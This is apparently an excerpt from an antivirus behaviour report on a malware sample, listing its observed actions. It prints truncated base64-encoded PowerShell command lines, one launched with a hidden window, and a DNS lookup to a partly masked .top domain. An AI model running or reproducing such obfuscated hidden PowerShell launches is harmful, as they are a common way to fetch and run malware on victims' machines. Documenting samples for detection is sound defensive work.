Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JAB0AFQAZABJAHYASgA9ACcAUgB1AGMAMQBtAFMAJwA7ACQAVgBUAHcAagBZAHYAIAA9ACAAJwA4ADgANwAnADsAJABaAFMAdQBHAE0AOQA9ACcATgBsAEgAegBhADMAZgBNACcAOwAkAEgAbgBLAHcAWAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcA...
- DNS ASK jj####bbthb7.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JAB0AFQAZABJAHYASgA9ACcAUgB1AGMAMQBtAFMAJwA7ACQAVgBUAHcAagBZAHYAIAA9ACAAJwA4ADgANwAnADsAJABaAFMAdQBHAE0AOQA9ACcATgBsAEgAegBhADMAZgBNACcAOwAkAEgAbgBLAHcAWAA5AD0AJABlAG4AdgA6AHUAcwBlAHIAcA...' (со скрытым окном)